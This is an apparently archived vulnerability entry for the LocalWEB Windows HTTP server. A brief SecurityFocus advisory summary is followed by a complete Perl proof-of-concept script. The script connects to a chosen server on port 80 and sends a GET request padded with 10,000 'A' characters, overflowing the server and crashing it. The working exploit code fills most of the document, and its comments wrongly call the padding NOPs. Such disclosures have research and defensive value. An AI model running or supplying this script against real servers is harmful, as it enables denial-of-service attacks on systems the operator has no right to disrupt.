source: http://www.securityfocus.com/bid/1423/info LocalWEB is a freeware HTTP server for the Windows suite of operating systems. Certain versions of this software are vulnerable to a remotely exploitable buffer overflow attack. This attack can instrumented by sending the web server (via port 80) a malformed URL. The net result is a denial of service, however a remotely exploitable buffer overflow leading to a system compromise has not been ruled out. # ./$0.pl -s <server> # # Malformed GET URL request DoS # use Getopt::Std; use Socket; getopts('s:', \%args); if(!defined($args{s})){&usage;} my($serv,$port,$foo,$number,$data,$buf,$in_addr,$paddr,$proto); $foo = "A"; # this is the NOP $number = "10000"; # this is the total number of NOP $data .= $foo x $number; # result of $foo times $number $serv = $args{s}; # remote server $port = 80; # remote port, default is 80 $buf = "GET /$data HTTP/1.0\r\n\r\n"; # issue this response to the server $in_addr = (gethostbyname($serv))[4] || die("Error: $!\n"); $paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n"); $proto = getprotobyname('tcp') || die("Error: $!\n"); socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!"); connect(S, $paddr) ||die ("Error: $!"); select(S); $| = 1; select(STDOUT); print S "$buf"; print("Data has been successfully sent to $serv\n"); sub usage {die("\n\n$0 -s <server>\n\n");}